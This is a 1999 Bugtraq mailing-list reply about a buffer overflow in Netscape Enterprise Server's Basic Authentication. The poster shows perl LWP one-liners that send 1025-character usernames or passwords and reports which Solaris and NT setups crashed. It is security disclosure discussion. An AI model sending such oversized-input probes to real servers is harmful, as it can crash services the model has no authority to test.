[12841] in bugtraq
Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise
daemon@ATHENA.MIT.EDU (Doug Monroe)
Fri Dec 3 15:12:50 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Message-Id: <3.0.3.32.19991202131732.006a39cc@postoffice.worldnet.att.net>
Date: Thu, 2 Dec 1999 13:17:32 -0500
Reply-To: Doug Monroe <monwel@INTERHACK.NET>
From: Doug Monroe <monwel@INTERHACK.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
RE:
> ISS Security Advisory
> December 1, 1999
> Buffer Overflow in Netscape Enterprise and FastTrack Authentication
> Procedure
I made a few simple pokes with variants of perl LWP's 'GET' function at
areas of 2 NES 3.x servers that are protected with Basic Authentication.
For example-
$ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
$ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path
Solaris 2.6/NES 3.5.1 (and 3.6.3)-
username:LONGpw -> http://server/private-path - NO KILL
LONGusername:pw -> http://server/private-path - NO KILL
NT4/SP4/NES 3.6.2-
username:LONGpw -> http://server/private-path - NO KILL
LONGusername:pw -> http://server/private-path - KILL
Potentially important diffs/notes:
On the Solaris box, the private area was config'd with .nsconfig/NCSA-style
ACL.
On the NT, the private area was protected using local-db ACL, not NCSA-style.
I have not tried poking a local-db/LDIF protected area on Solaris.
I have not tried poking a .nsconfig/NCSA-style area on NT.
I have not tried poking at the admin server of either box.
--
Doug Monroe
www.interhack.net
